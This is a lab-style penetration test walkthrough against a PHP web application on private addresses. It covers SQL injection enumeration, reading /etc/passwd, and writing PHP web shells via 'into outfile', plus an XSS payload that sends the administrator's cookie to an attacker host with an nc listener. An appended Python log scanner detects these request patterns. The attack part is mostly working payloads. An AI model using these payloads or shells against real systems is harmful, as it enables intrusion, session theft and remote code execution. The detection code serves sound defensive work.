SQLi
Discover possible injection points
Attempt to verify injection
according to
http://192.168.35.128/cat.php?id=1' or 1=1%23 returns an error, indicating that the injection here is not string-based
http://192.168.35.128/cat.php?id=1 and 1=1 displays normally
http://192.168.35.128/cat.php?id=1 and 1=2 displays nothing
This shows that there is an injection point here and that it is a numeric injection
http://192.168.35.128/cat.php?id=1 order by 4 displays normally
http://192.168.35.128/cat.php?id=1 order by 5 returns an error
This shows that there are only 4 fields in the current table
Find out which fields are displayed
The displayed field is 2
Get the database name
Get the table name
Get the field names
Get the data
Log in to the admin backend to upload a webshell; php is filtered, so change it to uppercase, and a shell is obtained successfully
XSS (there is no bot, so the administrator login can only be simulated manually)
Find possible XSS vulnerability points
Test for the existence of vulnerabilities
The alert box with 1 pops up successfully, indicating that the vulnerability exists
Write the attack code and set up a listener locally
<script>document.write('<img src="http://192.168.243.133/?'+document.cookie+' "/>');</script>
nc -lvnp 80
After the administrator logs in, the administrator's cookie information is obtained
Visit the web page with the cookie (this can be done in the console with document.cookie="xx") and successfully log in as the administrator
Then look for an injection point
Verify
and 1=1 displays normally
and 1=2 displays nothing
This indicates that there is SQL injection
order by shows 4 fields
Find the displayed columns: http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,3,4
2 and 3 are the displayed columns
Read passwd: http://192.168.243.135/admin/edit.php?id=2%20and%201=2%20union%20select%201,2,load_file(%22/etc/passwd%22),4
Reading shadow returns no output, possibly due to insufficient permissions
Look for exposed directory information and try to write a file
http://192.168.179.130/admin/edit.php?id=0%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/classes/test.php%22
Accessing the file returns 404; there may be no write permission
Try another directory (there is a css directory in the source code)
Try to write again; accessing the file now shows output
OK, this directory can be used; basically you can do whatever you want
Write a command-execution file
http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20system($_GET[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test.php%22
Write a one-line webshell
http://192.168.243.135/admin/edit.php?id=0%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27a%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/test4.php%22
Successfully get the shell
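Every request in this walkthrough travels in the GET query string, so the whole sequence is visible in the web server access log. The following is an added example, not part of the original write-up: a log check that flags the probe, enumeration, file-read and file-write requests shown above. The rule names, the log lines and the client address are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rule names are hypothetical; each pattern matches one request shape from the write-up.
RULES = [
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("order-by-enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("file-read", re.compile(r"\bload_file\s*\(", re.I)),
    ("file-write", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
]
# Access-log prefix: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Constructed sample log; 203.0.113.7 is a documentation-range client address.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cat.php?id=1 HTTP/1.1" 200 1532
203.0.113.7 - - [01/Jan/2024:10:00:04 +0000] "GET /cat.php?id=1%20and%201=2 HTTP/1.1" 200 812
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cat.php?id=1%20order%20by%205 HTTP/1.1" 200 310
203.0.113.7 - - [01/Jan/2024:10:03:10 +0000] "GET /admin/edit.php?id=2%20and%201=2%20union%20select%201,2,load_file(%22/etc/passwd%22),4 HTTP/1.1" 200 2210
203.0.113.7 - - [01/Jan/2024:10:05:41 +0000] "GET /admin/edit.php?id=0%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/test.php%22 HTTP/1.1" 200 640
"""

def decode(value, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded input is still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    hits = [name for name, rx in RULES if rx.search(decode(query))]
    if not hits:
        return None
    return {"ip": m["ip"], "path": path, "status": int(m["status"]), "rules": hits}

def scan(log_text):
    return [f for f in map(scan_line, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A file-write hit followed by a 200 on a new .php file under a static directory such as /css/ is the point at which this chain has reached code execution. The check is a triage aid only; the fix is parameterized queries and a database account without the FILE privilege.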